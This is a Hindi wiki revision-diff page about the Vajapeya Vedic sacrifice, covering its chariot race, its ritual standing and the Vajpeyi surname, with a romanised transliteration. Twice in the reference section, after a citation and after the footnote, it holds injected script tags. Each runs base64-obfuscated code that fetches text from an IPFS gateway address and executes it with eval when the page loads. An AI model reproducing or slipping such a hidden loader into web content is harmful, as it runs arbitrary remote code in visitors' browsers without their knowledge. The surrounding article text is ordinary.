Difference between revisions of "वाजपेय"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " कायम" to " क़ायम")
Line 3: Line 3:
 
इस यज्ञ का एक आवश्यक अंग रथों की दौड़ है, जिसमें यज्ञकर्ता विजयी होता है। हिलब्रैण्ट ने इसकी तुलना ओलम्पिक खेलों के साथ की है, किन्तु इस विषय में प्रमाणों का अभाव है। यह यज्ञ प्रारम्भिक रथ-दौड़ से ही विकसित हुआ जान पड़ता है, जो यज्ञ के रूप में दिव्य शक्ति की सहायता से यज्ञकर्ता को सफलता प्रदान करता है। एगेलिंग का कथन ठीक जान पड़ता है कि यह यज्ञ ब्राह्मण द्वारा [[पुरोहित]] पद ग्रहण करने का पूर्व [[संस्कार]] तथा तथा राजाओं के लिए राज्याभिषेक का पूर्व संस्कार था।
 
इस यज्ञ का एक आवश्यक अंग रथों की दौड़ है, जिसमें यज्ञकर्ता विजयी होता है। हिलब्रैण्ट ने इसकी तुलना ओलम्पिक खेलों के साथ की है, किन्तु इस विषय में प्रमाणों का अभाव है। यह यज्ञ प्रारम्भिक रथ-दौड़ से ही विकसित हुआ जान पड़ता है, जो यज्ञ के रूप में दिव्य शक्ति की सहायता से यज्ञकर्ता को सफलता प्रदान करता है। एगेलिंग का कथन ठीक जान पड़ता है कि यह यज्ञ ब्राह्मण द्वारा [[पुरोहित]] पद ग्रहण करने का पूर्व [[संस्कार]] तथा तथा राजाओं के लिए राज्याभिषेक का पूर्व संस्कार था।
 
==इतिहास==
 
==इतिहास==
ब्राह्मणों के जाने-पहचाने उपनामों या कुल गोत्रों में एक वाजपेयी भी है। कहीं-कहीं इसे बाजपेई, बाजपायी भी लिखा जाता है, लेकिन इसका सही रूप वाजपेयी ही है। वाजपेयी उपनाम भी ज्ञान परम्परा से जुड़ा है और इसका रिश्ता वैदिक संस्कृति के एक प्रमुख अनुष्ठान 'वाजपेय यज्ञ' से है, जो पूर्व-वैदिक काल की [[कृषि]]-संस्कृति की देन है। ब्राह्मण ग्रंथों के मुताबिक वाजपेय अनुष्ठान कराने का अधिकार सिर्फ ब्राह्मण और क्षत्रिय वर्णों को ही था। यह तो स्पष्ट है कि [[आर्य|आर्यों]] में [[यज्ञ]] की परिपाटी जनमंगल और जनकल्याण की भावना से थी, बाद में इसने रूढ़ अनुष्ठानों का रूप लिया। पुरोहित और [[ब्राह्मण]] वर्ग के लगातार शक्तिशाली होते जाने और महत्वाकांक्षा बढ़ने के परिणामस्वरूप इस वर्ग में भी कई वर्ग, उपवर्ग विकसित हो गए थे, जो अपने स्तर पर वैदिक संहिताओं और संचित ज्ञान की व्याख्या करने लगे। इनका उद्धेश्य सामंत और श्रेष्ठी वर्ग में अपना वर्चस्व कायम करना था। पुराणोपनिषद काल में इस विवाद प्रारम्भ हुआ और फिर इतना बढ़ा कि उसकी प्रतिक्रियास्वरूप हिन्दुत्व के भीतर से ही [[बौद्ध धर्म]] का जन्म हुआ, जो मूलतः 'ब्राह्मणवाद' के विरुद्ध था।<ref>{{cite web |url=http://shabdavali.blogspot.in/2010_04_01_archive.html|title=शब्दों का सफर|accessmonthday=28 मार्च|accessyear=2012|last= |first= |authorlink= |format=एच.टी.एम.एल.|publisher= |language=[[हिन्दी]]}}</ref>
+
ब्राह्मणों के जाने-पहचाने उपनामों या कुल गोत्रों में एक वाजपेयी भी है। कहीं-कहीं इसे बाजपेई, बाजपायी भी लिखा जाता है, लेकिन इसका सही रूप वाजपेयी ही है। वाजपेयी उपनाम भी ज्ञान परम्परा से जुड़ा है और इसका रिश्ता वैदिक संस्कृति के एक प्रमुख अनुष्ठान 'वाजपेय यज्ञ' से है, जो पूर्व-वैदिक काल की [[कृषि]]-संस्कृति की देन है। ब्राह्मण ग्रंथों के मुताबिक वाजपेय अनुष्ठान कराने का अधिकार सिर्फ ब्राह्मण और क्षत्रिय वर्णों को ही था। यह तो स्पष्ट है कि [[आर्य|आर्यों]] में [[यज्ञ]] की परिपाटी जनमंगल और जनकल्याण की भावना से थी, बाद में इसने रूढ़ अनुष्ठानों का रूप लिया। पुरोहित और [[ब्राह्मण]] वर्ग के लगातार शक्तिशाली होते जाने और महत्वाकांक्षा बढ़ने के परिणामस्वरूप इस वर्ग में भी कई वर्ग, उपवर्ग विकसित हो गए थे, जो अपने स्तर पर वैदिक संहिताओं और संचित ज्ञान की व्याख्या करने लगे। इनका उद्धेश्य सामंत और श्रेष्ठी वर्ग में अपना वर्चस्व क़ायम करना था। पुराणोपनिषद काल में इस विवाद प्रारम्भ हुआ और फिर इतना बढ़ा कि उसकी प्रतिक्रियास्वरूप हिन्दुत्व के भीतर से ही [[बौद्ध धर्म]] का जन्म हुआ, जो मूलतः 'ब्राह्मणवाद' के विरुद्ध था।<ref>{{cite web |url=http://shabdavali.blogspot.in/2010_04_01_archive.html|title=शब्दों का सफर|accessmonthday=28 मार्च|accessyear=2012|last= |first= |authorlink= |format=एच.टी.एम.एल.|publisher= |language=[[हिन्दी]]}}</ref>
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}

Revision as of 14:17, 29 January 2013

vajapey ek prakar ka shrautayajn hai. 'shatapath brahman' ke anusar yah yajn keval brahman ya kshatriyoan ke dvara hi karaniy hai. yah yajn 'rajasooy yajn' se bhi shreshth mana gaya hai. any granthoan ke mat se yah purohit ke lie brihaspati satr ka evan raja ke lie rajasooy ka poorvakrity hai.

yajn paddhati

is yajn ka ek avashyak aang rathoan ki dau d hai, jisamean yajnakarta vijayi hota hai. hilabraint ne isaki tulana olampik kheloan ke sath ki hai, kintu is vishay mean pramanoan ka abhav hai. yah yajn prarambhik rath-dau d se hi vikasit hua jan p data hai, jo yajn ke roop mean divy shakti ki sahayata se yajnakarta ko saphalata pradan karata hai. egeliang ka kathan thik jan p data hai ki yah yajn brahman dvara purohit pad grahan karane ka poorv sanskar tatha tatha rajaoan ke lie rajyabhishek ka poorv sanskar tha.

itihas

brahmanoan ke jane-pahachane upanamoan ya kul gotroan mean ek vajapeyi bhi hai. kahian-kahian ise bajapeee, bajapayi bhi likha jata hai, lekin isaka sahi roop vajapeyi hi hai. vajapeyi upanam bhi jnan parampara se ju da hai aur isaka rishta vaidik sanskriti ke ek pramukh anushthan 'vajapey yajn' se hai, jo poorv-vaidik kal ki krishi-sanskriti ki den hai. brahman granthoan ke mutabik vajapey anushthan karane ka adhikar sirph brahman aur kshatriy varnoan ko hi tha. yah to spasht hai ki aryoan mean yajn ki paripati janamangal aur janakalyan ki bhavana se thi, bad mean isane roodh anushthanoan ka roop liya. purohit aur brahman varg ke lagatar shaktishali hote jane aur mahatvakaanksha badhane ke parinamasvaroop is varg mean bhi kee varg, upavarg vikasit ho ge the, jo apane star par vaidik sanhitaoan aur sanchit jnan ki vyakhya karane lage. inaka uddheshy samant aur shreshthi varg mean apana varchasv qayam karana tha. puranopanishad kal mean is vivad prarambh hua aur phir itana badha ki usaki pratikriyasvaroop hindutv ke bhitar se hi bauddh dharm ka janm hua, jo moolatah 'brahmanavad' ke viruddh tha.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

hindoo dharmakosh |lekhak: d aau. rajabali pandey |prakashak: uttar pradesh hindi sansthan |prishth sankhya: 581 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

  1. shabdoan ka saphar (hindi) (ech.ti.em.el.). . abhigaman tithi: 28 march, 2012.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh